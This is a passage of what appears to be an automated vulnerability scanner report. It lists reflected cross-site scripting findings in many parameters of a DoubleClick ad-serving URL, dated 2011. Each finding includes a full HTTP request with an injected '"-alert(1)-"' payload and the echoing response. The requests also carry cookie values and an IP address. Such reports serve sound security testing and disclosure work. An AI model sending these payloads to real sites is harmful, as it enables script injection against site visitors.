com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com9081e"-alert(1)-"4fbee5b54b9&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/http://www.hp.com/united-states/campaigns/elite-products/index.html?jumpid=ex_R2612_go/elite-products/dm
...[SNIP]...

3.233. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [pg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.6

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1dbfe"-alert(1)-"45f9826e8c3 was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@1dbfe"-alert(1)-"45f9826e8c3&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:31 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4621



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
ite=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@1dbfe"-alert(1)-"45f9826e8c3&t=2011.04.27.23.14.41&event=58/http://www.hp.com/united-states/campaigns/elite-products/index.html?jumpid=ex_R2612_go/elite-products/dm:_N5823.CBSi_63094146_240279859_41826606");
var wmode = "opaque";
...[SNIP]...

3.234. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.6

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fde4c"-alert(1)-"bdb9a49c390 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=fde4c"-alert(1)-"bdb9a49c390&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4622



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
7/153/%2a/k%3B240279859%3B0-0%3B0%3B63094146%3B4307-300/250%3B41826606/41844393/2%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=fde4c"-alert(1)-"bdb9a49c390&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&
...[SNIP]...

3.235. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [pp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.6

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5da6b"-alert(1)-"f9a15ac6d12 was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=1005da6b"-alert(1)-"f9a15ac6d12&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4620



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
B240279859%3B0-0%3B0%3B63094146%3B4307-300/250%3B41826606/41844393/2%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=1005da6b"-alert(1)-"f9a15ac6d12&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/http
...[SNIP]...

3.236. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [ppartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.6

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dfd6a"-alert(1)-"3d131037658 was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=dfd6a"-alert(1)-"3d131037658&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4621



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
3D%3fhttp://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=dfd6a"-alert(1)-"3d131037658&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/http://www.hp.com/united-states/campaigns/elite-products/index.html?jumpid=ex_R2612_go
...[SNIP]...

3.237. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [pt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.6

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 131f2"-alert(1)-"77497b5cb61 was submitted in the pt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000131f2"-alert(1)-"77497b5cb61&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4622



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
Dv8/3af6/17/153/%2a/k%3B240279859%3B0-0%3B0%3B63094146%3B4307-300/250%3B41826606/41844393/2%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000131f2"-alert(1)-"77497b5cb61&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27
...[SNIP]...

3.238. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [ra parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.6

Issue detail

The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9436b"-alert(1)-"3e60fe5490d was submitted in the ra parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.2439436b"-alert(1)-"3e60fe5490d&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4621



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.2439436b"-alert(1)-"3e60fe5490d&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/http://www.hp.com/united-states/campaigns/elite-products/index.html?jumpid=ex_R2612_go/elite-products/dm:_N5823.CBSi_63094146_240279859_41826
...[SNIP]...

3.239. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [rqid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.6

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bebad"-alert(1)-"78e78d75f6e was submitted in the rqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6bebad"-alert(1)-"78e78d75f6e&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4620



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
-300/250%3B41826606/41844393/2%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6bebad"-alert(1)-"78e78d75f6e&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/http://www.hp.com/united-states/campaigns/
...[SNIP]...

3.240. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [sg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.6

Issue detail

The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a32f"-alert(1)-"8ab85cbf533 was submitted in the sg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=5111465a32f"-alert(1)-"8ab85cbf533&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4622



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/153/%2a/k%3B240279859%3B0-0%3B0%3B63094146%3B4307-300/250%3B41826606/41844393/2%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10737&sg=5111465a32f"-alert(1)-"8ab85cbf533&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214
...[SNIP]...

3.241. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.6

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 309db"-alert(1)-"fcea8914433 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3309db"-alert(1)-"fcea8914433&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4622



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
ck%3Bh%3Dv8/3af6/17/153/%2a/k%3B240279859%3B0-0%3B0%3B63094146%3B4307-300/250%3B41826606/41844393/2%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3309db"-alert(1)-"fcea8914433&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=20
...[SNIP]...

3.242. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.6

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f4ee"-alert(1)-"dfc4896d193 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=107371f4ee"-alert(1)-"dfc4896d193&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4622



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/153/%2a/k%3B240279859%3B0-0%3B0%3B63094146%3B4307-300/250%3B41826606/41844393/2%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=107371f4ee"-alert(1)-"dfc4896d193&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=1
...[SNIP]...

3.243. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [t parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.6

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec397"-alert(1)-"e0f06d702a was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41ec397"-alert(1)-"e0f06d702a&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
